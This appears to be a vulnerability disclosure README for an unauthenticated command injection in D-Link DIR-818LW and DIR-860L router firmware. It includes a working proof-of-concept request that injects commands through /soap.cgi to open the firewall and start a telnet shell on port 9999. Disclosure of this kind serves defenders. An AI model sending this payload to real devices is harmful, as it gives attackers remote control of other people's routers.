Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information.

D-Link Unauthenticated OS Command Injection

Vender: D-Link

Firmware version: DIR-818LW_REVA - 2.05.B03, DIR-860L_REVB - 2.03.B03

Exploit Author:

Vendor Homepage:

Hardware Link:,

The detail of vulnerability

I found unauthenticated remote code execution vulnerability in soapcgi_main function of cgibin binary.

On the /soap.cgi HTTP POST message on 49152 port, with the service GET parameter, the unauthenticated remote attacker can execute the shell command.

The similar vulnerability already exists with CVE-2018-6530, and some firmware was already added character sanitizing with strchr function.

However, on the firmware DIR-818LW_REVA_PATCH_2.05.B03, DIR-860L_REVB_2.03.B03; they not fully filtered the vulnerable character.

With && string, the device can be exploited, too.


# nc 49152
POST /soap.cgi?service=&&iptables -P INPUT ACCEPT&&iptables -P FORWARD ACCEPT&&iptables -P OUTPUT ACCEPT&&iptables -t nat -P PREROUTING ACCEPT&&iptables -t nat -P OUTPUT ACCEPT&&iptables -t nat -P POSTROUTING ACCEPT&&telnetd -p 9999&& HTTP/1.1
Accept-Encoding: identity
Content-Length: 16
SOAPAction: "whatever-serviceType#whatever-action"
Content-Type: text/xml

# telnet 9999